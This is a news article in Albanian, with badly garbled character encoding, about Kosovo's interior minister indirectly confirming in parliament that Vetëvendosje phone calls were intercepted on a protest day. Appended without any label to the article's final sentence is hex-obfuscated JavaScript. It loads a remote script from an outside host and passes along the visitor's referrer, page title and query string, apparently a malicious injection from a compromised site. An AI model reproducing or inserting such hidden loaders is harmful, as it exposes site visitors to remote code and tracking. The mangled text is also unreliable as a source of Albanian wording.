f.1101221007645_m

Rexhepi konfirmoi pA�rgjimin e a�?VetA�vendosjesa�?

NA� mA�nyrA� indirekte, ministri i PunA�ve tA� Brendshme tA� KosovA�s, Bajram Rexhepi konfirmoi nA� Kuvendin e KosovA�s se janA� pA�rgjuar telefonat e lA�vizjes VetA�vendosje nA� ditA�n e protestA�s kundA�r bisedimeve politike me SerbinA�.

I pyetur nga deputetja e kA�saj lA�vizje, Albulena Haxhiu, pA�r nenin 31 tA� Ligjit pA�r policinA�, i cili ndalon kA�tA� tA� fundit tA� mbledhA� e tA� ruajA� informata pA�r personat qA� kanA� tA� bA�jnA� me bindjen politike, fetare e filozofike, ministri Rexhepi tha se njA�sitet e inteligjencA�s marrin informata vetA�m pA�r ato A�A�shtje qA� ndikojnA� nA� prishjen e rendit publik.

Debati mes deputetes Haxhiu dhe ministrit Rexhepi vazhdoi edhe pA�r faktin se policia e KosovA�s nA� strukturA�n e saj ka edhe departamentin e inteligjencA�s.

Pyetja e deputetes sA� VetA�vendosjes ishte nA�se pA�r kA�tA� A�shtA� e informuar Agjencia Kosovare e InteligjencA�s, Presidenca dhe komisioni parlamentar pA�r siguri.

Ministri Rexhepi konfirmoi se ky njA�sit ekziston brenda departamentit tA� hetimeve dhe se oficerA� tA� tij nuk duhet tA� ngatA�rrohen me AgjencinA� Kosovare tA� InteligjencA�s. Sipas tij, qasja mA� e re e policisA� ishte ajo e udhA�hequr nga inteligjenca, raporton TCH.

Ministri shtoi se derisa nA� tA� kaluarA�n policia ka qenA� vetA�m vepruese, tani A�shtA� vetA� pranuese e informatave dhe nA� kA�tA� mA�nyrA� parandalon situata tA� padA�shirueshme.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}